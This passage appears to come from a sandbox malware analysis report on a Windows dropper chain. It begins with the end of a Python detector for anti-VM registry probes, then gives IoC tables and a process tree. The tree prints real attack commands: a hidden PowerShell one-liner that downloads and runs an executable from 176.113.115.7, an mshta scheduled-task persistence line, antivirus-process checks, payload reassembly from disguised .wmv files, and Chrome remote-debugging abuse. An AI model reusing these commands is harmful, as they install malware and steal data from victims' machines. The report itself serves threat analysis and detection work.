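(process, target) events.  Added example, not sandbox or malware code; the
SAMPLE_EVENTS are constructed from rows in the report and the indicator
classes are this example's own."""
import re
from collections import defaultdict

# "strong" classes are artefacts ordinary software has no reason to touch;
# "weak" classes are hardware identity queries that browsers and telemetry
# agents perform too.  Patterns run against the lower-cased target.
STRONG = {
    "acpi_vbox":          r"\\hardware\\acpi\\dsdt\\vbox__$",
    "bios_version":       r"\\hardware\\description\\system\\(system|video)biosversion$",
    "wine":               r"\\software\\wine$",
    "vbox_device":        r"^\\\?\?\\vboxminirdrdn$",
    "hide_from_debugger": r"^ntsetinformationthread:threadhidefromdebugger$",
}
WEAK = {
    "cpu_name": r"\\centralprocessor\\0(\\(processornamestring|vendoridentifier))?$",
    "bios_oem": r"\\description\\system\\bios(\\(systemmanufacturer|systemproductname))?$",
}
STRONG_RX = {name: re.compile(rx) for name, rx in STRONG.items()}
WEAK_RX = {name: re.compile(rx) for name, rx in WEAK.items()}


def classify_events(events):
    """Return {process: {"strong": [...], "weak": [...], "verdict": str}}.

    verdicts: "evasive" (two or more distinct strong classes), "possible"
    (exactly one), "hardware_query_only" (weak classes only), "none".
    Distinct classes are counted, not raw hits, so a loop that re-reads one
    key a thousand times does not outrank a process that probes five things."""
    hits = defaultdict(lambda: {"strong": set(), "weak": set()})
    for process, target in events:
        t = target.lower()
        for name, rx in STRONG_RX.items():
            if rx.search(t):
                hits[process]["strong"].add(name)
        for name, rx in WEAK_RX.items():
            if rx.search(t):
                hits[process]["weak"].add(name)
    out = {}
    for process, h in hits.items():
        strong, weak = len(h["strong"]), len(h["weak"])
        if strong >= 2:
            verdict = "evasive"
        elif strong == 1:
            verdict = "possible"
        elif weak:
            verdict = "hardware_query_only"
        else:
            verdict = "none"
        out[process] = {"strong": sorted(h["strong"]), "weak": sorted(h["weak"]), "verdict": verdict}
    return out


# Constructed from rows in the report: registry/file targets as the sandbox
# prints them, plus a synthetic "api" target for the HideFromDebugger call.
SID = r"\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000"
SAMPLE_EVENTS = [
    ("advnrNo.exe",  r"\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__"),
    ("advnrNo.exe",  r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion"),
    ("advnrNo.exe",  r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion"),
    ("advnrNo.exe",  SID + r"\Software\Wine"),
    ("advnrNo.exe",  r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString"),
    ("advnrNo.exe",  "NtSetInformationThread:ThreadHideFromDebugger"),
    ("rapes.exe",    r"\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__"),
    ("rapes.exe",    SID + r"\Software\Wine"),
    ("3ff3734d.exe", r"\??\VBoxMiniRdrDN"),
    ("chrome.exe",   r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier"),
    ("chrome.exe",   r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer"),
    ("chrome.exe",   r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName"),
]

if __name__ == "__main__":
    for process, result in classify_events(SAMPLE_EVENTS).items():
        print(f"{process:14} {result['verdict']:20} strong={result['strong']} weak={result['weak']}")
```

The same grouping works on EDR registry and file telemetry; the lists of strong classes grow with whatever your sandboxes actually expose (VMware and QEMU device names, known sandbox user names), and any process that scores "evasive" and then goes quiet is the one whose dumps deserve a second look.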
Kills process with taskkill 6 IoCs
pid | Process
13924 | taskkill.exe
13864 | taskkill.exe
3156 | taskkill.exe
3356 | taskkill.exe
12648 | taskkill.exe
14040 | taskkill.exe

Modifies data under HKEY_USERS 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133872805000093494" | chrome.exe

Modifies registry key 1 TTPs 4 IoCs
pid | Process
9076 | reg.exe
8832 | reg.exe
4760 | reg.exe
9220 | reg.exe
Modifies system certificate store 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 QL4t9UZ.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] QL4t9UZ.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7184 schtasks.exe 9312 schtasks.exe 3744 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4584 powershell.exe 4584 powershell.exe 1580 Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE 1580 Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE 4304 rapes.exe 4304 rapes.exe 1836 Organizations.com 1836 Organizations.com 1836 Organizations.com 1836 Organizations.com 1836 Organizations.com 1836 Organizations.com 6024 advnrNo.exe 6024 advnrNo.exe 6024 advnrNo.exe 6024 advnrNo.exe 4584 MSBuild.exe 4584 MSBuild.exe 4584 MSBuild.exe 4584 MSBuild.exe 6024 advnrNo.exe 6024 advnrNo.exe 380 chrome.exe 380 chrome.exe 4728 powershell.exe 4728 powershell.exe 4728 powershell.exe 1836 Organizations.com 1836 Organizations.com 1836 Organizations.com 1836 Organizations.com 1456 fontdrvhost.exe 1456 fontdrvhost.exe 1456 fontdrvhost.exe 1456 fontdrvhost.exe 6024 advnrNo.exe 6024 advnrNo.exe 4688 MSBuild.exe 4688 MSBuild.exe 4688 MSBuild.exe 4688 MSBuild.exe 6024 advnrNo.exe 6024 advnrNo.exe 6024 advnrNo.exe 6024 advnrNo.exe 6840 powershell.exe 6840 powershell.exe 6840 powershell.exe 6024 advnrNo.exe 6024 advnrNo.exe 1236 rapes.exe 1236 rapes.exe 7312 powershell.exe 7312 powershell.exe 7312 powershell.exe 8072 TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE 8072 TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE 8288 powershell.exe 8288 powershell.exe 8288 powershell.exe 8708 powershell.exe 8708 powershell.exe 8708 powershell.exe 12132 d91c7611.exe -
Suspicious behavior: LoadsDriver 7 IoCs
pid Process 2040 tzutil.exe 660 Process not Found 660 Process not Found 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 672 y0u3d_003.exe 672 y0u3d_003.exe 672 y0u3d_003.exe 10824 laf6w_001.exe 10824 laf6w_001.exe 10824 laf6w_001.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 13012 msedge.exe 13012 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4584 powershell.exe Token: SeDebugPrivilege 1780 tasklist.exe Token: SeDebugPrivilege 1656 tasklist.exe Token: SeShutdownPrivilege 380 chrome.exe Token: SeCreatePagefilePrivilege 380 chrome.exe Token: SeShutdownPrivilege 380 chrome.exe Token: SeCreatePagefilePrivilege 380 chrome.exe Token: SeDebugPrivilege 4728 powershell.exe Token: SeShutdownPrivilege 380 chrome.exe Token: SeCreatePagefilePrivilege 380 chrome.exe Token: SeShutdownPrivilege 380 chrome.exe Token: SeCreatePagefilePrivilege 380 chrome.exe Token: SeShutdownPrivilege 380 chrome.exe Token: SeCreatePagefilePrivilege 380 chrome.exe Token: SeShutdownPrivilege 380 chrome.exe Token: SeCreatePagefilePrivilege 380 chrome.exe Token: SeShutdownPrivilege 380 chrome.exe Token: SeCreatePagefilePrivilege 380 chrome.exe Token: SeLoadDriverPrivilege 2040 tzutil.exe Token: SeDebugPrivilege 6840 powershell.exe Token: SeDebugPrivilege 12132 d91c7611.exe Token: SeBackupPrivilege 12132 d91c7611.exe Token: SeRestorePrivilege 12132 d91c7611.exe Token: SeLoadDriverPrivilege 12132 d91c7611.exe Token: SeShutdownPrivilege 12132 d91c7611.exe Token: SeSystemEnvironmentPrivilege 12132 d91c7611.exe Token: SeSecurityPrivilege 12132 d91c7611.exe Token: SeBackupPrivilege 12132 d91c7611.exe Token: SeRestorePrivilege 12132 d91c7611.exe Token: SeDebugPrivilege 12132 d91c7611.exe Token: SeSystemEnvironmentPrivilege 12132 d91c7611.exe Token: SeSecurityPrivilege 12132 d91c7611.exe Token: SeCreatePermanentPrivilege 12132 d91c7611.exe Token: SeShutdownPrivilege 12132 d91c7611.exe Token: SeLoadDriverPrivilege 12132 d91c7611.exe Token: SeIncreaseQuotaPrivilege 12132 d91c7611.exe Token: SeSecurityPrivilege 12132 d91c7611.exe Token: SeSystemProfilePrivilege 12132 d91c7611.exe Token: SeDebugPrivilege 12132 d91c7611.exe Token: SeMachineAccountPrivilege 12132 d91c7611.exe Token: SeCreateTokenPrivilege 12132 d91c7611.exe Token: SeAssignPrimaryTokenPrivilege 12132 d91c7611.exe Token: SeTcbPrivilege 12132 d91c7611.exe Token: SeAuditPrivilege 12132 d91c7611.exe Token: SeSystemEnvironmentPrivilege 12132 d91c7611.exe Token: SeLoadDriverPrivilege 12132 d91c7611.exe Token: SeLoadDriverPrivilege 12132 d91c7611.exe Token: SeIncreaseQuotaPrivilege 12132 d91c7611.exe Token: SeSecurityPrivilege 12132 d91c7611.exe Token: SeSystemProfilePrivilege 12132 d91c7611.exe Token: SeDebugPrivilege 12132 d91c7611.exe Token: SeMachineAccountPrivilege 12132 d91c7611.exe Token: SeCreateTokenPrivilege 12132 d91c7611.exe Token: SeAssignPrimaryTokenPrivilege 12132 d91c7611.exe Token: SeTcbPrivilege 12132 d91c7611.exe Token: SeAuditPrivilege 12132 d91c7611.exe Token: SeSystemEnvironmentPrivilege 12132 d91c7611.exe Token: SeDebugPrivilege 7312 powershell.exe Token: SeDebugPrivilege 8288 powershell.exe Token: SeDebugPrivilege 8708 powershell.exe Token: SeDebugPrivilege 9028 powershell.exe Token: SeDebugPrivilege 9460 powershell.exe Token: SeIncreaseQuotaPrivilege 12132 d91c7611.exe Token: SeSecurityPrivilege 12132 d91c7611.exe -
Suspicious use of FindShellTrayWindow 36 IoCs
pid Process 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 1836 Organizations.com 1836 Organizations.com 1836 Organizations.com 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 380 chrome.exe 13012 msedge.exe 3228 32ae679328.exe 3228 32ae679328.exe 3228 32ae679328.exe -
Suspicious use of SendNotifyMessage 9 IoCs
pid Process 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 1836 Organizations.com 1836 Organizations.com 1836 Organizations.com 3228 32ae679328.exe 3228 32ae679328.exe 3228 32ae679328.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 6000 wrote to memory of 6024 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 87 PID 6000 wrote to memory of 6024 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 87 PID 6000 wrote to memory of 6024 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 87 PID 6000 wrote to memory of 5096 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 88 PID 6000 wrote to memory of 5096 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 88 PID 6000 wrote to memory of 5096 6000 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 88 PID 6024 wrote to memory of 3744 6024 cmd.exe 90 PID 6024 wrote to memory of 3744 6024 cmd.exe 90 PID 6024 wrote to memory of 3744 6024 cmd.exe 90 PID 5096 wrote to memory of 4584 5096 mshta.exe 92 PID 5096 wrote to memory of 4584 5096 mshta.exe 92 PID 5096 wrote to memory of 4584 5096 mshta.exe 92 PID 4584 wrote to memory of 1580 4584 powershell.exe 98 PID 4584 wrote to memory of 1580 4584 powershell.exe 98 PID 4584 wrote to memory of 1580 4584 powershell.exe 98 PID 1580 wrote to memory of 4304 1580 Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE 102 PID 1580 wrote to memory of 4304 1580 Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE 102 PID 1580 wrote to memory of 4304 1580 Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE 102 PID 4304 wrote to memory of 2536 4304 rapes.exe 107 PID 4304 wrote to memory of 2536 4304 rapes.exe 107 PID 4304 wrote to memory of 2536 4304 rapes.exe 107 PID 2536 wrote to memory of 1168 2536 zx4PJh6.exe 108 PID 2536 wrote to memory of 1168 2536 zx4PJh6.exe 108 PID 2536 wrote to memory of 1168 2536 zx4PJh6.exe 108 PID 1168 wrote to memory of 1780 1168 CMD.exe 112 PID 1168 wrote to memory of 1780 1168 CMD.exe 112 PID 1168 wrote to memory of 1780 1168 CMD.exe 112 PID 1168 wrote to memory of 3064 1168 CMD.exe 113 PID 1168 wrote to memory of 3064 1168 CMD.exe 113 PID 1168 wrote to memory of 3064 1168 CMD.exe 113 PID 1168 wrote to memory of 1656 1168 CMD.exe 114 PID 1168 wrote to memory of 1656 1168 CMD.exe 114 PID 1168 wrote to memory of 1656 1168 CMD.exe 114 PID 1168 wrote to memory of 5360 1168 CMD.exe 115 PID 1168 wrote to memory of 5360 1168 CMD.exe 115 PID 1168 wrote to memory of 5360 1168 CMD.exe 115 PID 1168 wrote to memory of 1488 1168 CMD.exe 116 PID 1168 wrote to memory of 1488 1168 CMD.exe 116 PID 1168 wrote to memory of 1488 1168 CMD.exe 116 PID 1168 wrote to memory of 3100 1168 CMD.exe 117 PID 1168 wrote to memory of 3100 1168 CMD.exe 117 PID 1168 wrote to memory of 3100 1168 CMD.exe 117 PID 1168 wrote to memory of 1200 1168 CMD.exe 118 PID 1168 wrote to memory of 1200 1168 CMD.exe 118 PID 1168 wrote to memory of 1200 1168 CMD.exe 118 PID 1168 wrote to memory of 5704 1168 CMD.exe 119 PID 1168 wrote to memory of 5704 1168 CMD.exe 119 PID 1168 wrote to memory of 5704 1168 CMD.exe 119 PID 1168 wrote to memory of 3716 1168 CMD.exe 120 PID 1168 wrote to memory of 3716 1168 CMD.exe 120 PID 1168 wrote to memory of 3716 1168 CMD.exe 120 PID 1168 wrote to memory of 1836 1168 CMD.exe 121 PID 1168 wrote to memory of 1836 1168 CMD.exe 121 PID 1168 wrote to memory of 1836 1168 CMD.exe 121 PID 1168 wrote to memory of 5852 1168 CMD.exe 122 PID 1168 wrote to memory of 5852 1168 CMD.exe 122 PID 1168 wrote to memory of 5852 1168 CMD.exe 122 PID 4304 wrote to memory of 6024 4304 rapes.exe 124 PID 4304 wrote to memory of 6024 4304 rapes.exe 124 PID 4304 wrote to memory of 6024 4304 rapes.exe 124 PID 4304 wrote to memory of 824 4304 rapes.exe 126 PID 4304 wrote to memory of 824 4304 rapes.exe 126 PID 824 wrote to memory of 1136 824 OkH8IPF.exe 128 PID 824 wrote to memory of 1136 824 OkH8IPF.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2580
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1456
-
-
C:\Users\Admin\AppData\Local\Temp\86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe"C:\Users\Admin\AppData\Local\Temp\86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:6000 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn EmIJHmaHeti /tr "mshta C:\Users\Admin\AppData\Local\Temp\fxr22cHRS.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6024 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn EmIJHmaHeti /tr "mshta C:\Users\Admin\AppData\Local\Temp\fxr22cHRS.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3744
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\fxr22cHRS.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Users\Admin\AppData\Local\Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE"C:\Users\Admin\AppData\Local\Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Users\Admin\AppData\Local\Temp\10286670101\zx4PJh6.exe"C:\Users\Admin\AppData\Local\Temp\10286670101\zx4PJh6.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1780
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
PID:3064
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
PID:5360
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4408248⤵
- System Location Discovery: System Language Discovery
PID:1488
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Architecture.wmv8⤵
- System Location Discovery: System Language Discovery
PID:3100
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Offensive" Inter8⤵
- System Location Discovery: System Language Discovery
PID:1200
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com8⤵
- System Location Discovery: System Language Discovery
PID:5704
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h8⤵
- System Location Discovery: System Language Discovery
PID:3716
-
-
C:\Users\Admin\AppData\Local\Temp\440824\Organizations.comOrganizations.com h8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1836 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 9129⤵
- Program crash
PID:3592
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 58⤵
- System Location Discovery: System Language Discovery
PID:5852
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10287840101\advnrNo.exe"C:\Users\Admin\AppData\Local\Temp\10287840101\advnrNo.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:6024 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:380 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff97b8edcf8,0x7ff97b8edd04,0x7ff97b8edd108⤵PID:5208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1988,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1984 /prefetch:28⤵PID:5020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2232,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2236 /prefetch:38⤵PID:1564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2400,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2536 /prefetch:88⤵PID:3888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3228,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3240 /prefetch:18⤵
- Uses browser remote debugging
PID:5180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3300 /prefetch:18⤵
- Uses browser remote debugging
PID:640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4260,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4272 /prefetch:28⤵
- Uses browser remote debugging
PID:4884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4584,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4552 /prefetch:18⤵
- Uses browser remote debugging
PID:5608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4804,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4812 /prefetch:88⤵PID:1140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4716,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4944 /prefetch:88⤵PID:2392
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5276,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5292 /prefetch:88⤵PID:5212
-
-
